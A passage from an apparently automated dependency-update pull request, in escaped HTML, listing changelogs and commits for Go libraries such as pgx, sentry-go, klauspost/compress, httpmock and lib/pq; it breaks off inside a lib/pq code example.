(truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-go/commit/16414f29918c1fb660d4792046f08224dfefc632\"\u003e\u003ccode\u003e16414f2\u003c/code\u003e\u003c/a\u003e release: 0.44.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-go/commit/d26d3ecd4bceb8b900147c2e8faf993c1fdf8720\"\u003e\u003ccode\u003ed26d3ec\u003c/code\u003e\u003c/a\u003e ci: add preReleaseCommand for craft (\u003ca href=\"https://redirect.github.com/getsentry/sentry-go/issues/1232\"\u003e#1232\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-go/commit/65538eb2c2b714f1aec781267612d97e4a4f8d94\"\u003e\u003ccode\u003e65538eb\u003c/code\u003e\u003c/a\u003e build(deps): bump github.com/buger/jsonparser in /zerolog (\u003ca href=\"https://redirect.github.com/getsentry/sentry-go/issues/1231\"\u003e#1231\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-go/commit/91096be62b80b40a2e1d8e62f42115dede34c054\"\u003e\u003ccode\u003e91096be\u003c/code\u003e\u003c/a\u003e chore: pin GitHub Actions to full-length commit SHAs (\u003ca href=\"https://redirect.github.com/getsentry/sentry-go/issues/1230\"\u003e#1230\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-go/commit/df391b0baee60760635a948da32e82e362d7a84e\"\u003e\u003ccode\u003edf391b0\u003c/code\u003e\u003c/a\u003e feat: add RemoveAttribute api on the scope (\u003ca href=\"https://redirect.github.com/getsentry/sentry-go/issues/1224\"\u003e#1224\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-go/commit/340c142cf974aaba7dcb6545101fe125a7d8ad7c\"\u003e\u003ccode\u003e340c142\u003c/code\u003e\u003c/a\u003e fix: TestAsyncTransport_SendEnvelope flakiness (\u003ca href=\"https://redirect.github.com/getsentry/sentry-go/issues/1226\"\u003e#1226\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-go/commit/e561a25fe7f0b594a005138bf71db4fd12faacf3\"\u003e\u003ccode\u003ee561a25\u003c/code\u003e\u003c/a\u003e build: Bump getsentry/craft to 2.24.1 (\u003ca href=\"https://redirect.github.com/getsentry/sentry-go/issues/1225\"\u003e#1225\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-go/commit/259b20563d61c7da69d8d83361427e1a8bbd873a\"\u003e\u003ccode\u003e259b205\u003c/code\u003e\u003c/a\u003e feat: add support for homogenous arrays (\u003ca href=\"https://redirect.github.com/getsentry/sentry-go/issues/1203\"\u003e#1203\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-go/commit/bf26e9a107879c566124e27d5af51bd1851428d1\"\u003e\u003ccode\u003ebf26e9a\u003c/code\u003e\u003c/a\u003e fix: fix flaky TestAsyncTransport_FlushWithContext (\u003ca href=\"https://redirect.github.com/getsentry/sentry-go/issues/1222\"\u003e#1222\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-go/commit/d1edaf4192ea39be6e16ec5145ded927adfed9e9\"\u003e\u003ccode\u003ed1edaf4\u003c/code\u003e\u003c/a\u003e chore(ai): Add AGENTS.md and testing guidelines (\u003ca href=\"https://redirect.github.com/getsentry/sentry-go/issues/1216\"\u003e#1216\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/getsentry/sentry-go/compare/v0.34.1...v0.44.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/jackc/pgx/v5` from 5.7.5 to 5.9.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jackc/pgx/blob/master/CHANGELOG.md\"\u003egithub.com/jackc/pgx/v5's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e5.9.1 (March 22, 2026)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFix: batch result format corruption when using cached prepared statements (reported by Dirkjan Bussink)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e5.9.0 (March 21, 2026)\u003c/h1\u003e\n\u003cp\u003eThis release includes a number of new features such as SCRAM-SHA-256-PLUS support, OAuth authentication support, and\nPostgreSQL protocol 3.2 support.\u003c/p\u003e\n\u003cp\u003eIt significantly reduces the amount of network traffic when using prepared statements (which are used automatically by\ndefault) by avoiding unnecessary Describe Portal messages. This also reduces local memory usage.\u003c/p\u003e\n\u003cp\u003eIt also includes multiple fixes for potential DoS due to panic or OOM if connected to a malicious server that sends\ndeliberately malformed messages.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eRequire Go 1.25+\u003c/li\u003e\n\u003cli\u003eAdd SCRAM-SHA-256-PLUS support (Adam Brightwell)\u003c/li\u003e\n\u003cli\u003eAdd OAuth authentication support for PostgreSQL 18 (David Schneider)\u003c/li\u003e\n\u003cli\u003eAdd PostgreSQL protocol 3.2 support (Dirkjan Bussink)\u003c/li\u003e\n\u003cli\u003eAdd tsvector type support (Adam Brightwell)\u003c/li\u003e\n\u003cli\u003eSkip Describe Portal for cached prepared statements reducing network round trips\u003c/li\u003e\n\u003cli\u003eMake LoadTypes query easier to support on \u0026quot;postgres-like\u0026quot; servers (Jelte Fennema-Nio)\u003c/li\u003e\n\u003cli\u003eDefault empty user to current OS user matching libpq behavior (ShivangSrivastava)\u003c/li\u003e\n\u003cli\u003eOptimize LRU statement cache with custom linked list and node pooling (Mathias Bogaert)\u003c/li\u003e\n\u003cli\u003eOptimize date scanning by replacing regex with manual parsing (Mathias Bogaert)\u003c/li\u003e\n\u003cli\u003eOptimize pgio append/set functions with direct byte shifts (Mathias Bogaert)\u003c/li\u003e\n\u003cli\u003eMake RowsAffected faster (Abhishek Chanda)\u003c/li\u003e\n\u003cli\u003eFix: Pipeline.Close panic when server sends multiple FATAL errors (Varun Chawla)\u003c/li\u003e\n\u003cli\u003eFix: ContextWatcher goroutine leak (Hank Donnay)\u003c/li\u003e\n\u003cli\u003eFix: stdlib discard connections with open transactions in ResetSession (Jeremy Schneider)\u003c/li\u003e\n\u003cli\u003eFix: pipelineBatchResults.Exec silently swallowing lastRows error\u003c/li\u003e\n\u003cli\u003eFix: ColumnTypeLength using BPCharArrayOID instead of BPCharOID\u003c/li\u003e\n\u003cli\u003eFix: TSVector text encoding returning nil for valid empty tsvector\u003c/li\u003e\n\u003cli\u003eFix: wrong error messages for Int2 and Int4 underflow\u003c/li\u003e\n\u003cli\u003eFix: Numeric nil Int pointer dereference with Valid: true\u003c/li\u003e\n\u003cli\u003eFix: reversed strings.ContainsAny arguments in Numeric.ScanScientific\u003c/li\u003e\n\u003cli\u003eFix: message length parsing on 32-bit platforms\u003c/li\u003e\n\u003cli\u003eFix: FunctionCallResponse.Decode mishandling of signed result size\u003c/li\u003e\n\u003cli\u003eFix: returning wrong error in configTLS when DecryptPEMBlock fails (Maxim Motyshen)\u003c/li\u003e\n\u003cli\u003eFix: misleading ParseConfig error when default_query_exec_mode is invalid (Skarm)\u003c/li\u003e\n\u003cli\u003eFix: missed Unwatch in Pipeline error paths\u003c/li\u003e\n\u003cli\u003eClarify too many failed acquire attempts error message\u003c/li\u003e\n\u003cli\u003eBetter error wrapping with context and SQL statement (Aneesh Makala)\u003c/li\u003e\n\u003cli\u003eEnable govet and ineffassign linters (Federico Guerinoni)\u003c/li\u003e\n\u003cli\u003eGuard against various malformed binary messages (arrays, hstore, multirange, protocol messages)\u003c/li\u003e\n\u003cli\u003eFix various godoc comments (ferhat elmas)\u003c/li\u003e\n\u003cli\u003eFix typos in comments (Oleksandr Redko)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e5.8.0 (December 26, 2025)\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jackc/pgx/commit/4e4eaedb47b7b3cfba0a1b0a9e6a3f015764f046\"\u003e\u003ccode\u003e4e4eaed\u003c/code\u003e\u003c/a\u003e Release v5.9.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jackc/pgx/commit/62731882651a90348febb43b2119b5f8bd9272de\"\u003e\u003ccode\u003e6273188\u003c/code\u003e\u003c/a\u003e Fix batch result format corruption when using cached prepared statements\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jackc/pgx/commit/f7b90c2f1ac099f00e67d6d4d0fee6deb330bc94\"\u003e\u003ccode\u003ef7b90c2\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/jackc/pgx/issues/2524\"\u003e#2524\u003c/a\u003e from dbussink/pipeline-result-format-reuse\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jackc/pgx/commit/3ce6d75be4baa8d1e4b4f880da5f9ad68ab14e7f\"\u003e\u003ccode\u003e3ce6d75\u003c/code\u003e\u003c/a\u003e Add failing test: batch scan corrupted in cache_statement mode\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jackc/pgx/commit/b4d8e62b6616d0c09c5021500363de0c56e01631\"\u003e\u003ccode\u003eb4d8e62\u003c/code\u003e\u003c/a\u003e Release v5.9.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jackc/pgx/commit/c227cd4f76fa2b1a47c0156621e05c076f4cf5c9\"\u003e\u003ccode\u003ec227cd4\u003c/code\u003e\u003c/a\u003e Bump minimum Go version from 1.24 to 1.25\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jackc/pgx/commit/f492c14836d7d442e8103b09f2c0c74a80c56347\"\u003e\u003ccode\u003ef492c14\u003c/code\u003e\u003c/a\u003e Use reflect.TypeFor instead of reflect.TypeOf for static types\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jackc/pgx/commit/ad8fb08d3f1a36c0e475c9f80dc9bb19d075d8e2\"\u003e\u003ccode\u003ead8fb08\u003c/code\u003e\u003c/a\u003e Use sync.WaitGroup.Go to simplify goroutine spawning\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jackc/pgx/commit/303377376df43ba3d1a99728eaa9f9a6bcaab767\"\u003e\u003ccode\u003e3033773\u003c/code\u003e\u003c/a\u003e Remove go1.26 build tag from synctest test\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jackc/pgx/commit/83ffb3c2220737cf11c7dd88c80be9166753102f\"\u003e\u003ccode\u003e83ffb3c\u003c/code\u003e\u003c/a\u003e Validate multirange element count against source length before allocating\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/jackc/pgx/compare/v5.7.5...v5.9.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/jarcoal/httpmock` from 1.4.0 to 1.4.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jarcoal/httpmock/releases\"\u003egithub.com/jarcoal/httpmock's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.4.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003etest: also test with go v1.25 and use golangci-lint v2.4.0 by \u003ca href=\"https://github.com/maxatome\"\u003e\u003ccode\u003e@​maxatome\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jarcoal/httpmock/pull/164\"\u003ejarcoal/httpmock#164\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid data race when closing body by \u003ca href=\"https://github.com/DavyJohnes\"\u003e\u003ccode\u003e@​DavyJohnes\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jarcoal/httpmock/pull/165\"\u003ejarcoal/httpmock#165\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/DavyJohnes\"\u003e\u003ccode\u003e@​DavyJohnes\u003c/code\u003e\u003c/a\u003e made his first contribution in \u003ca href=\"https://redirect.github.com/jarcoal/httpmock/pull/165\"\u003ejarcoal/httpmock#165\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/jarcoal/httpmock/compare/v1.4.0...v1.4.1\"\u003ehttps://github.com/jarcoal/httpmock/compare/v1.4.0...v1.4.1\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jarcoal/httpmock/commit/314d58a0690c92c71b2a9de2d62d52c74c328546\"\u003e\u003ccode\u003e314d58a\u003c/code\u003e\u003c/a\u003e fix: protect all body-related methods with mutext\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jarcoal/httpmock/commit/e482896659149810cdc8b9262611a0059150b661\"\u003e\u003ccode\u003ee482896\u003c/code\u003e\u003c/a\u003e fix: avoid data race when closing body\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jarcoal/httpmock/commit/c97714566220b6410cf4f7937db771d1876e8e98\"\u003e\u003ccode\u003ec977145\u003c/code\u003e\u003c/a\u003e test: also test with go v1.25 and use golangci-lint v2.4.0\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/jarcoal/httpmock/compare/v1.4.0...v1.4.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/klauspost/compress` from 1.18.0 to 1.18.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/klauspost/compress/releases\"\u003egithub.com/klauspost/compress's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.18.5\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ezstd: Fix crash when changing encoder dictionary with same ID by \u003ca href=\"https://github.com/klauspost\"\u003e\u003ccode\u003e@​klauspost\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1135\"\u003eklauspost/compress#1135\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ezstd: Default to full zero frames by \u003ca href=\"https://github.com/klauspost\"\u003e\u003ccode\u003e@​klauspost\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1134\"\u003eklauspost/compress#1134\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eflate: Clean up histogram order by \u003ca href=\"https://github.com/klauspost\"\u003e\u003ccode\u003e@​klauspost\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1133\"\u003eklauspost/compress#1133\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/klauspost/compress/compare/v1.18.4...v1.18.5\"\u003ehttps://github.com/klauspost/compress/compare/v1.18.4...v1.18.5\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.18.4\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003egzhttp: Add zstandard to server handler wrapper by \u003ca href=\"https://github.com/klauspost\"\u003e\u003ccode\u003e@​klauspost\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1121\"\u003eklauspost/compress#1121\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ezstd: Add ResetWithOptions to encoder/decoder by \u003ca href=\"https://github.com/klauspost\"\u003e\u003ccode\u003e@​klauspost\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1122\"\u003eklauspost/compress#1122\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003egzhttp: preserve qvalue when extra parameters follow in Accept-Encoding by \u003ca href=\"https://github.com/analytically\"\u003e\u003ccode\u003e@​analytically\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1116\"\u003eklauspost/compress#1116\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/analytically\"\u003e\u003ccode\u003e@​analytically\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1116\"\u003eklauspost/compress#1116\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ethaizone\"\u003e\u003ccode\u003e@​ethaizone\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1124\"\u003eklauspost/compress#1124\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/zwass\"\u003e\u003ccode\u003e@​zwass\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1125\"\u003eklauspost/compress#1125\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/klauspost/compress/compare/v1.18.2...v1.18.4\"\u003ehttps://github.com/klauspost/compress/compare/v1.18.2...v1.18.4\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.18.3\u003c/h2\u003e\n\u003cp\u003eDownstream CVE-2025-61728\u003c/p\u003e\n\u003cp\u003eSee \u003ca href=\"https://redirect.github.com/golang/go/issues/77102\"\u003egolang/go#77102\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/klauspost/compress/compare/v1.18.2...v1.18.3\"\u003ehttps://github.com/klauspost/compress/compare/v1.18.2...v1.18.3\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.18.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eflate: Fix invalid encoding on level 9 with single value input by \u003ca href=\"https://github.com/klauspost\"\u003e\u003ccode\u003e@​klauspost\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1115\"\u003eklauspost/compress#1115\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eflate: reduce stateless allocations by \u003ca href=\"https://github.com/RXamzin\"\u003e\u003ccode\u003e@​RXamzin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1106\"\u003eklauspost/compress#1106\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump github/codeql-action from 3.30.5 to 4.31.2 in the github-actions group by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1111\"\u003eklauspost/compress#1111\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ccode\u003ev1.18.1\u003c/code\u003e is marked \u0026quot;retracted\u0026quot; due to invalid flate/zip/gzip encoding.\u003c/p\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/RXamzin\"\u003e\u003ccode\u003e@​RXamzin\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1106\"\u003eklauspost/compress#1106\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/klauspost/compress/compare/v1.18.1...v1.18.2\"\u003ehttps://github.com/klauspost/compress/compare/v1.18.1...v1.18.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.18.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ezstd: Fix incorrect buffer size in dictionary encodes by \u003ca href=\"https://github.com/klauspost\"\u003e\u003ccode\u003e@​klauspost\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1059\"\u003eklauspost/compress#1059\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003es2: check for cap, not len of buffer in EncodeBetter/Best by \u003ca href=\"https://github.com/vdarulis\"\u003e\u003ccode\u003e@​vdarulis\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1080\"\u003eklauspost/compress#1080\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ezstd: Add simple zstd EncodeTo/DecodeTo functions by \u003ca href=\"https://github.com/klauspost\"\u003e\u003ccode\u003e@​klauspost\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1079\"\u003eklauspost/compress#1079\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ezlib: Avoiding extra allocation in zlib.reader.Reset by \u003ca href=\"https://github.com/travelpolicy\"\u003e\u003ccode\u003e@​travelpolicy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1086\"\u003eklauspost/compress#1086\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003egzhttp: remove redundant err check in zstdReader by \u003ca href=\"https://github.com/ryanfowler\"\u003e\u003ccode\u003e@​ryanfowler\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/klauspost/compress/pull/1090\"\u003eklauspost/compress#1090\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/klauspost/compress/commit/c5e0077f50a3268a27b02816adc48ebfb535c65e\"\u003e\u003ccode\u003ec5e0077\u003c/code\u003e\u003c/a\u003e zstd: Fix encoder changing dictionary with same ID (\u003ca href=\"https://redirect.github.com/klauspost/compress/issues/1135\"\u003e#1135\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/klauspost/compress/commit/fd3f23e2d1d0fca18f38ee2dfedb73d0ca5b02e5\"\u003e\u003ccode\u003efd3f23e\u003c/code\u003e\u003c/a\u003e zstd: Default to full zero frames (\u003ca href=\"https://redirect.github.com/klauspost/compress/issues/1134\"\u003e#1134\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/klauspost/compress/commit/8233c587ef6e7b0f5168bfc08e63ea37e97b2d36\"\u003e\u003ccode\u003e8233c58\u003c/code\u003e\u003c/a\u003e flate: Clean up histogram order (\u003ca href=\"https://redirect.github.com/klauspost/compress/issues/1133\"\u003e#1133\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/klauspost/compress/commit/bcf0d1289c8df01178af919dd5d8ff83afaa5471\"\u003e\u003ccode\u003ebcf0d12\u003c/code\u003e\u003c/a\u003e build(deps): bump the github-actions group with 3 updates (\u003ca href=\"https://redirect.github.com/klauspost/compress/issues/1132\"\u003e#1132\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/klauspost/compress/commit/cf758fe1c54e3049f302474d2a98afd3acc1a884\"\u003e\u003ccode\u003ecf758fe\u003c/code\u003e\u003c/a\u003e ci: Upgrade Go versions, clean up (\u003ca href=\"https://redirect.github.com/klauspost/compress/issues/1130\"\u003e#1130\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/klauspost/compress/commit/77cc5203de2eb0034a63eace182bb28aa869cb83\"\u003e\u003ccode\u003e77cc520\u003c/code\u003e\u003c/a\u003e Add v1.18.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/klauspost/compress/commit/c03560f58ab1f595f17838b482483849d585d0c2\"\u003e\u003ccode\u003ec03560f\u003c/code\u003e\u003c/a\u003e zstd: Add ResetWithOptions to encoder/decoder (\u003ca href=\"https://redirect.github.com/klauspost/compress/issues/1122\"\u003e#1122\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/klauspost/compress/commit/0874ab860fc90779cb032996aee0c9e11880738c\"\u003e\u003ccode\u003e0874ab8\u003c/code\u003e\u003c/a\u003e build(deps): bump the github-actions group with 3 updates (\u003ca href=\"https://redirect.github.com/klauspost/compress/issues/1126\"\u003e#1126\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/klauspost/compress/commit/4a368369aa67e1da850e9a38fbbbea7c20cfd377\"\u003e\u003ccode\u003e4a36836\u003c/code\u003e\u003c/a\u003e doc: Clarify documentation in readme (\u003ca href=\"https://redirect.github.com/klauspost/compress/issues/1125\"\u003e#1125\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/klauspost/compress/commit/4309644706928691448da21eaa03895b982e086c\"\u003e\u003ccode\u003e4309644\u003c/code\u003e\u003c/a\u003e zstd: document concurrency option handling in encoder (\u003ca href=\"https://redirect.github.com/klauspost/compress/issues/1124\"\u003e#1124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/klauspost/compress/compare/v1.18.0...v1.18.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/lib/pq` from 1.10.9 to 1.12.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/lib/pq/releases\"\u003egithub.com/lib/pq's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.12.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eLook for pgpass file in ~/.pgpass instead of ~/.postgresql/pgpass (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1300\"\u003e#1300\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eDon't clear password if directly set on pq.Config (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1302\"\u003e#1302\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/lib/pq/issues/1300\"\u003e#1300\u003c/a\u003e: \u003ca href=\"https://redirect.github.com/lib/pq/pull/1300\"\u003elib/pq#1300\u003c/a\u003e\n\u003ca href=\"https://redirect.github.com/lib/pq/issues/1302\"\u003e#1302\u003c/a\u003e: \u003ca href=\"https://redirect.github.com/lib/pq/pull/1302\"\u003elib/pq#1302\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.12.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eThe next release may change the default sslmode from \u003ccode\u003erequire\u003c/code\u003e to \u003ccode\u003eprefer\u003c/code\u003e. See \u003ca href=\"https://redirect.github.com/lib/pq/issues/1271\"\u003e#1271\u003c/a\u003e for details.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ccode\u003eCopyIn()\u003c/code\u003e and \u003ccode\u003eCopyInToSchema()\u003c/code\u003e have been marked as deprecated. These are simple query builders and not needed for \u003ccode\u003eCOPY [..] FROM STDIN\u003c/code\u003e support (which is \u003cem\u003enot\u003c/em\u003e deprecated). (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1279\"\u003e#1279\u003c/a\u003e)\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e// Old\r\ntx.Prepare(CopyIn(\u0026quot;temp\u0026quot;, \u0026quot;num\u0026quot;, \u0026quot;text\u0026quot;, 